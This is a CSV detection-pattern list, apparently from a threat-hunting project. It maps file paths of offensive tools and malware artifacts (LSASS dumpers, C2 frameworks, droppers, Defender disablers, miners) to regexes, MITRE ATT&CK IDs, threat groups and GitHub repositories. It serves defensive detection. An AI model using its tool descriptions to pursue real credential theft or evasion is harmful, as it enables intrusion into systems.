"*\dpapi.py*",".{0,1000}\\dpapi\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15059"
"*\dpat.py*",".{0,1000}\\dpat\.py.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","15060"
"*\DragonCastle.dll*",".{0,1000}\\DragonCastle\.dll.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","15061"
"*\DragonCastle.pdb*",".{0,1000}\\DragonCastle\.pdb.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","15062"
"*\DragonCastle-master\*",".{0,1000}\\DragonCastle\-master\\.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","15063"
"*\D-RAT.exe*",".{0,1000}\\D\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15064"
"*\DReverseClint.go*",".{0,1000}\\DReverseClint\.go.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","15066"
"*\DReverseServer.go*",".{0,1000}\\DReverseServer\.go.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","15067"
"*\DriverDump.c*",".{0,1000}\\DriverDump\.c.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15069"
"*\DriverDump.exe*",".{0,1000}\\DriverDump\.exe.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15070"
"*\DriverDump.sln*",".{0,1000}\\DriverDump\.sln.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15071"
"*\DriverDump.vcxproj*",".{0,1000}\\DriverDump\.vcxproj.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15072"
"*\dropper\dropit.py*",".{0,1000}\\dropper\\dropit\.py.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","15074"
"*\dropper\dropper.vba*",".{0,1000}\\dropper\\dropper\.vba.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","15075"
"*\drop-sc.py*",".{0,1000}\\drop\-sc\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15076"
"*\DRSAT.exe*",".{0,1000}\\DRSAT\.exe.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","15077"
"*\DRSAT-0.2.zip*",".{0,1000}\\DRSAT\-0\.2\.zip.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","15078"
"*\DSInternals.psd1*",".{0,1000}\\DSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","15079"
"*\dt87xz\Defender_Settings.vbs*",".{0,1000}\\dt87xz\\Defender_Settings\.vbs.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15080"
"*\DtMXQFOCos-RECOVER-README.txt*",".{0,1000}\\DtMXQFOCos\-RECOVER\-README\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15081"
"*\dual_mine_etc_aleph_herominer.bat*",".{0,1000}\\dual_mine_etc_aleph_herominer\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15082"
"*\dual_mine_etc_aleph_lhr_admin.bat*",".{0,1000}\\dual_mine_etc_aleph_lhr_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15083"
"*\dual_mine_etc_aleph_woolypooly.bat*",".{0,1000}\\dual_mine_etc_aleph_woolypooly\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15084"
"*\dual_mine_ethw_aleph_herominer.bat*",".{0,1000}\\dual_mine_ethw_aleph_herominer\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15085"
"*\dual_mine_ethw_aleph_lhr_admin.bat*",".{0,1000}\\dual_mine_ethw_aleph_lhr_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15086"
"*\dual_mine_ethw_aleph_woolypooly.bat*",".{0,1000}\\dual_mine_ethw_aleph_woolypooly\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15087"
"*\dual_mine_rth_aleph.bat*",".{0,1000}\\dual_mine_rth_aleph\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15088"
"*\dual_mine_rth_kls.bat*",".{0,1000}\\dual_mine_rth_kls\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15089"
"*\dual_mine_rth_rxd.bat*",".{0,1000}\\dual_mine_rth_rxd\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15090"
"*\duedlligence.dll*",".{0,1000}\\duedlligence\.dll.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","15096"
"*\dump.ps1*",".{0,1000}\\dump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15097"
"*\dumpCredStore.ps1*",".{0,1000}\\dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15098"
"*\dumper.ps1*",".{0,1000}\\dumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15099"
"*\dumper.ps1*",".{0,1000}\\dumper\.ps1.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","15100"
"*\dumper2020_exe*",".{0,1000}\\dumper2020_exe.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","15101"
"*\dumper2020_exe.cpp*",".{0,1000}\\dumper2020_exe\.cpp.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","15102"
"*\dumper2020-master*",".{0,1000}\\dumper2020\-master.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","15103"
"*\dumpert.*",".{0,1000}\\dumpert\..{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","15104"
"*\dumpert.dmp*",".{0,1000}\\dumpert\.dmp.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","N/A","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","15105"
"*\dumpert.py*",".{0,1000}\\dumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","15106"
"*\Dumpert\*",".{0,1000}\\Dumpert\\.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","15107"
"*\DumpExt.dll*",".{0,1000}\\DumpExt\.dll.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","15108"
"*\DumpIt.exe*",".{0,1000}\\DumpIt\.exe.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","15109"
"*\DumpLsass.ps1*",".{0,1000}\\DumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15110"
"*\dump-lsass.py*",".{0,1000}\\dump\-lsass\.py.{0,1000}","offensive_tool_keyword","impacket","Dump-lsass script using impacket - Automates the manual process of using wmiexec and procdump to dump Lsass and plaintext creds or hashes across a large number of systems.","T1021 - T1047 - T1055.011 - T1003","TA0002 - TA0005 - TA0006","N/A","Dispossessor - Black Basta","Credential Access","https://github.com/kaluche/Dump-Lsass","1","0","N/A","N/A","10","1","1","0","2019-11-14T18:15:26Z","2019-11-20T20:26:27Z","15111"
"*\DumpLSASS-main*",".{0,1000}\\DumpLSASS\-main.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","15112"
"*\DumpNParse.exe*",".{0,1000}\\DumpNParse\.exe.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","15113"
"*\DumpNParse.exe*",".{0,1000}\\DumpNParse\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","15114"
"*\DumpNParse-main*",".{0,1000}\\DumpNParse\-main.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","15115"
"*\DumpNTLMInfo.py*",".{0,1000}\\DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15116"
"*\DumpPEFromMemory.sln*",".{0,1000}\\DumpPEFromMemory\.sln.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15117"
"*\DumpPEFromMemory.vcxproj*",".{0,1000}\\DumpPEFromMemory\.vcxproj.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15118"
"*\dumpSecrets.go*",".{0,1000}\\dumpSecrets\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15120"
"*\dumpsecrets_test.go*",".{0,1000}\\dumpsecrets_test\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15121"
"*\DumpShellcode*",".{0,1000}\\DumpShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","0","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","15122"
"*\DumpSomeHashesAuto.py*",".{0,1000}\\DumpSomeHashesAuto\.py.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","15123"
